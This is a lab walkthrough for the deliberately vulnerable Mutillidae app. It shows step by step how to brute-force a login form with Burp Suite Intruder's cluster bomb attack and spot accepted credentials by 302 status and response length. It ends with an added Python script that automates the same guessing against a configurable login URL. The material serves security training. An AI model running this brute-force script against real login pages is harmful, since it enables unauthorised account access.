Access the lab

  1. OWASP 2013 → A1 INJECTION (SQL) → SQLi- Bypass Authentication → LOGIN
    attachments/Pasted image 20250312171321.png

  2. Turn Intercept on in Burp Suite, then submit the login form with username admin and any password (I entered cat).
    attachments/Pasted image 20250312171334.png

  3. In Burp, go to Proxy, right-click the intercepted POST request and send it to Intruder.
    attachments/Pasted image 20250312171302.png

  4. In Intruder, first click Clear to remove the automatic payload markers, then set the attack type to Cluster bomb (every value in the first list is tried with every value in the second).

  5. Highlight the password value and click Add, then highlight the username value and click Add, so there are two payload positions, one per field.
    attachments/Pasted image 20250312171214.png

  6. For payload set 1 enter five usernames: admin, deeps, pinky, rinky, root (the admin account's password is admin).
    attachments/Pasted image 20250312171203.png

  7. For payload set 2 enter five passwords: admin, deeps, cat, dog, test.

  8. After filling in both lists, click Start attack. Cluster bomb sends all 5 × 5 = 25 username/password combinations, so what we are running here is a plain credential brute force, not an injection.
    attachments/Pasted image 20250312171139.png

  9. In the results, a status code of 302 means the credentials were accepted and the application redirects into the logged-in page; a 200 means the login form was re-rendered with an error, so that password is wrong. Sort by Status, and check the Length column too: the successful attempt usually has a noticeably different response size from the failures.
    attachments/Pasted image 20250312171111.png

  10. Select the admin / admin request and send it to Repeater.
    attachments/Pasted image 20250312171020.png

  11. In Repeater, click Send.
    attachments/Pasted image 20250312171003.png

  12. Click Follow redirection so Burp fetches the page the 302 Location header points to.
    attachments/Pasted image 20250312170943.png

  13. Open the Render tab: the page shows "Status update: user authenticated".
    attachments/Pasted image 20250312170919.png

  14. Click on WordPress.
    attachments/Pasted image 20250312170901.png

  15. Click on Login.
    attachments/Pasted image 20250312170842.png

  16. Enter the same username and password here; this login rejects them and reports that the username is wrong for this password.
    attachments/Pasted image 20250312170817.png
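The Intruder run from steps 4 to 9, reproduced as a script so the detection logic is explicit. This is an added example, not part of these notes and not code from Mutillidae or Burp. The login URL, the form field names (username, password, login-php-submit-button) and the offline stand-in for the lab are assumptions; check the field names against your own intercepted request before pointing it at a real target.

```python
"""Cluster-bomb credential check mirroring the Burp Intruder steps above."""
import itertools
import urllib.error
import urllib.parse
import urllib.request
from collections import Counter
from typing import Callable, List, Tuple

# ASSUMED target details: Mutillidae's login URL and the field names seen in
# the intercepted POST. Verify them against your own Burp capture.
LOGIN_URL = "http://127.0.0.1/mutillidae/index.php?page=login.php"
USER_FIELD = "username"
PASS_FIELD = "password"
SUBMIT_FIELD = "login-php-submit-button"   # assumed submit-button field name

# The same two payload lists used in the Intruder steps.
USERNAMES = ["admin", "deeps", "pinky", "rinky", "root"]
PASSWORDS = ["admin", "deeps", "cat", "dog", "test"]

Result = Tuple[str, str, int, int]   # (username, password, status, body length)


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Do not follow 302s: the raw status code is the success signal."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None   # makes urllib raise HTTPError(302), caught in send()


def http_sender(url: str = LOGIN_URL) -> Callable[[str, str], Tuple[int, int]]:
    """Build a sender that POSTs one credential pair and returns (status, length)."""
    opener = urllib.request.build_opener(_NoRedirect)

    def send(user: str, pw: str) -> Tuple[int, int]:
        body = urllib.parse.urlencode(
            {USER_FIELD: user, PASS_FIELD: pw, SUBMIT_FIELD: "Login"}
        ).encode()
        req = urllib.request.Request(url, data=body, method="POST")
        try:
            with opener.open(req, timeout=10) as resp:
                return resp.status, len(resp.read())
        except urllib.error.HTTPError as err:   # 302 / 4xx / 5xx all land here
            return err.code, len(err.read())

    return send


def cluster_bomb(usernames, passwords, send) -> List[Result]:
    """Try every username with every password (Burp's Cluster bomb), in order."""
    return [
        (user, pw, *send(user, pw))
        for user, pw in itertools.product(usernames, passwords)
    ]


def successful_logins(results: List[Result], success_status: int = 302) -> List[Tuple[str, str]]:
    """Credential pairs whose response was a redirect, i.e. accepted by the app."""
    return [(u, p) for u, p, status, _ in results if status == success_status]


def outliers(results: List[Result]) -> List[Result]:
    """Every result whose (status, length) differs from the majority response.

    Sorting on Status alone misses apps that answer 200 either way; the
    Length column catches those, just as in Intruder's results table.
    """
    baseline, _ = Counter((s, n) for _, _, s, n in results).most_common(1)[0]
    return [r for r in results if (r[2], r[3]) != baseline]


# CONSTRUCTED stand-in for the lab so the example runs offline: only
# admin/admin is accepted (302 with an empty body); every other pair gets
# the login page back again with status 200 and a 4 KB body.
def fake_lab_send(user: str, pw: str) -> Tuple[int, int]:
    return (302, 0) if (user, pw) == ("admin", "admin") else (200, 4096)


if __name__ == "__main__":
    # Swap fake_lab_send for http_sender() to run against a real Mutillidae.
    res = cluster_bomb(USERNAMES, PASSWORDS, fake_lab_send)
    for u, p, status, length in res:
        print(f"{u:8} {p:8} {status} {length}")
    print("accepted:", successful_logins(res))
    print("outliers:", outliers(res))
```

Redirects are deliberately not followed, for the same reason Burp shows the 302 in the results table: following them would turn every hit into a 200 and hide the signal. `outliers()` is the scripted equivalent of eyeballing the Length column, which is the fallback when an application answers 200 to both good and bad logins.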